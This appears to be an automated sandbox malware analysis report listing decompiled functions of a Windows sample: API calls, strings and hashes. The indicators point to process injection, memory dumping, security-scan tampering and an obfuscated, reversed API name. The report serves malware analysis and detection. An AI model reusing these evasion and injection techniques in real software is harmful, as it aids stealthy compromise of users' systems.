                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Library$Thread$ContextFreeLoadMemoryVirtual$AddressAllocateProcResumeWrite
                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                        • API String ID: 4180202596-51457883
                                        • Opcode ID: 280bc9d1e09f313a85732776cc5bc5b6c7e4a32e1f168820fe60582a1a810a08
                                        • Instruction ID: 64deb1f73cb5649dd8f6f06e36520b1b4f5b5ffba0e8b5bb2e4fe10abd7af430
                                        • Opcode Fuzzy Hash: 280bc9d1e09f313a85732776cc5bc5b6c7e4a32e1f168820fe60582a1a810a08
                                        • Instruction Fuzzy Hash: D7E21A75A901189FDB22FBA4CDE0EDE73BAAF89310F1045E1E149AB314DE30AE459F51
                                        Function 02B48BAE Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B48824: LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
                                          • Part of subcall function 02B48824: FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
                                        • GetThreadContext.KERNEL32(00000000,02B91420,ScanString,02B913A4,02B4A77C,UacInitialize,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,UacInitialize,02B913A4), ref: 02B49442
                                          • Part of subcall function 02B479B4: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B47A27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Library$AllocateContextFreeLoadMemoryThreadVirtual
                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                        • API String ID: 4236972194-51457883
                                        • Opcode ID: ddd48761387a193ad62b4df4a95ba19f8621d431c9d44f28d5569e076873dbc0
                                        • Instruction ID: b713f3b56341368a51d50c513ef764af015a259c6bcb23d6d46cfc5a97e8e827
                                        • Opcode Fuzzy Hash: ddd48761387a193ad62b4df4a95ba19f8621d431c9d44f28d5569e076873dbc0
                                        • Instruction Fuzzy Hash: 29E21A75A901189FDB22FBA4CDE0EDE73BAAF89310F1045E1E149AB314DE30AE459F51
                                        Function 02B358B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B358D1
                                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02B358E8
                                        • lstrcpynA.KERNEL32(?,?,?), ref: 02B35918
                                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B3597C
                                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B359B2
                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B359C5
                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B359D7
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B36BD0,02B30000,02B5D790), ref: 02B359E3
                                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B36BD0,02B30000), ref: 02B35A17
                                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02B36BD0), ref: 02B35A23
                                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02B35A45
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                        • API String ID: 3245196872-1565342463
                                        • Opcode ID: 1ae536cdbea6963e06e317f39906551a241c21be159b7231cbbfc4beba7f2c3f
                                        • Instruction ID: d90793b21f2e1773d070cf190f12ff3a0edaedad4358f4a8459c73f98270190d
                                        • Opcode Fuzzy Hash: 1ae536cdbea6963e06e317f39906551a241c21be159b7231cbbfc4beba7f2c3f
                                        • Instruction Fuzzy Hash: 5B416F71D00659AFDB22DAE8CC88ADEB7BDEF08350F4445E5E598E7241D770AB448F50
                                        Function 02B35B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B35B94
                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B35BA1
                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B35BA7
                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B35BD2
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B35C19
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B35C29
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B35C51
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B35C61
                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B35C87
                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B35C97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                        • API String ID: 1599918012-2375825460
                                        • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                        • Instruction ID: 13cf925b2f0423cbffb713e3e736c604a8e200a0e7716b6754f38f65ec2e4e3e
                                        • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                        • Instruction Fuzzy Hash: FB315771E5021C6AEB37DAB89C45FDF77AD9B04384F8441E19648E6181EB749E848F50
                                        Function 02B4831C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B4838D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$MemoryProtectVirtual
                                        • String ID: ntdll$yromeMlautriVtcetorPtN
                                        • API String ID: 3897345246-351734974
                                        • Opcode ID: aa607433c180f8f78d039055462de0b104c5bf7bb35e948f4587bf634ba18a08
                                        • Instruction ID: 559c5ef4c5b98d223974c0849f4f76a614a3c19785603aa687be66da1cc8dfd1
                                        • Opcode Fuzzy Hash: aa607433c180f8f78d039055462de0b104c5bf7bb35e948f4587bf634ba18a08
                                        • Instruction Fuzzy Hash: AD012575614208BFEB01EFA8DC81E9E77BEEB4D754F5188A0F504E7A50CA30A910AB20
                                        Function 02B37F5A Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02B37F7D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1705453755-0
                                        • Opcode ID: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                        • Instruction ID: b7aaabd485317f555b08eaffbd1a95ab9062fc44c634bb4ab5cbe6a8ac849ec6
                                        • Opcode Fuzzy Hash: 60a0a3317bc6745db68fd0609a05e035b6386226a90ab679635ab5dbfaeb8164
                                        • Instruction Fuzzy Hash: DF11C0B5A00209AF9B05CF99C9819EFF7F9EFCC704B14C569A505EB254E671AA018B90
                                        Function 02B3A74C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B3A76A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                        • Instruction ID: 28944400958a7174c7110dc21b22d1af0e60cf65ca053054a78d97ce00966b94
                                        • Opcode Fuzzy Hash: 2128b34291823b7b3d39fc22196f9eeb1ad11300c5a3118c73b07de52b1b2571
                                        • Instruction Fuzzy Hash: 7EE0D836B0021457D313A5585C81DF6B36D975C350F1041FEBD44C7341EEB0AD404AE9
                                        Function 02B3B714 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetVersionExA.KERNEL32(?,02B5C106,00000000,02B5C11E), ref: 02B3B722
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: b0f7b1f71f23c768f2bdc5ef7ac9ac8f3f3c54c41cb6758749383d89a527dffd
                                        • Instruction ID: ba52b5678b0940e6d5c79c8d699a62114fcc4e8ac6e6c3d83647de725900b323
                                        • Opcode Fuzzy Hash: b0f7b1f71f23c768f2bdc5ef7ac9ac8f3f3c54c41cb6758749383d89a527dffd
                                        • Instruction Fuzzy Hash: E2F03478904312DFC340DF28D541B197BE5FB49B84F808AA9E898CB3A0E7349864CF12
                                        Function 02B3A798 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02B3BDFA,00000000,02B3C013,?,?,00000000,00000000), ref: 02B3A7AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID:
                                        • API String ID: 2299586839-0
                                        • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                        • Instruction ID: 060bdb76e626cb95cc2c41c7f09e835423856eeee6d79e1445a232e16d24fc82
                                        • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                        • Instruction Fuzzy Hash: 50D05EB630E2607AA221515A2D94DBB7AECCBC97A1F1080BEF588C6240D6008C0696B5
                                        Function 02B39194 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID:
                                        • API String ID: 481472006-0
                                        • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                        • Instruction ID: 534e1da22e05ee1bb0e832dcbf8ea8fa0e31fe8c6d09332e326bbba96f6c3039
                                        • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                        • Instruction Fuzzy Hash: 5CA01200404C2011854037190C0217531445900620FC40F8068F8402D0ED1D012040D7
                                        Function 02B5D596 Relevance: .2, Instructions: 215COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50c1d5995af9305e0791e78fcf54c19accc4d0414a42f5e18d00d25cb56bdd24
                                        • Instruction ID: c759e8e75f95dc47f2d3bbc2cf1d2a3b44799bb7569a75e985a7ffea6fae7f9f
                                        • Opcode Fuzzy Hash: 50c1d5995af9305e0791e78fcf54c19accc4d0414a42f5e18d00d25cb56bdd24
                                        • Instruction Fuzzy Hash: 7651419245E3D24FC7635F7494A53C33FA4AE3722474E56DAC8D48F1A3E209494BCB62
                                        Function 02B320C4 Relevance: .1, Instructions: 94COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                        Function 02B3D21C Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B3D225
                                          • Part of subcall function 02B3D1F0: GetProcAddress.KERNEL32(00000000), ref: 02B3D209
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                        • API String ID: 1646373207-1918263038
                                        • Opcode ID: 5a7225b189f8d3776496245d50e9675b5d3d816efe0e75feaf1a3886f0c22b91
                                        • Instruction ID: 741bded0836188cef23070fbae832cb0609c76c46921ed394ac31b8975d0a3d1
                                        • Opcode Fuzzy Hash: 5a7225b189f8d3776496245d50e9675b5d3d816efe0e75feaf1a3886f0c22b91
                                        • Instruction Fuzzy Hash: 46417E63A946075B560BBBAD75005277BEED7887A036085DBF048DB381DE30BCA19E3D
                                        Function 02B46E60 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B46E66
                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B46E77
                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B46E87
                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B46E97
                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B46EA7
                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B46EB7
                                        • GetProcAddress.KERNEL32 ref: 02B46EC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                        • API String ID: 667068680-2233174745
                                        • Opcode ID: 53c2e16e614cdda274d01083d3f72a9cd75f15adb28e0c684e1abdf45cd9c734
                                        • Instruction ID: 7c3a595a01e2766a2605c03c2ece033b062055669d2d13a5ae24e2825c89fa75
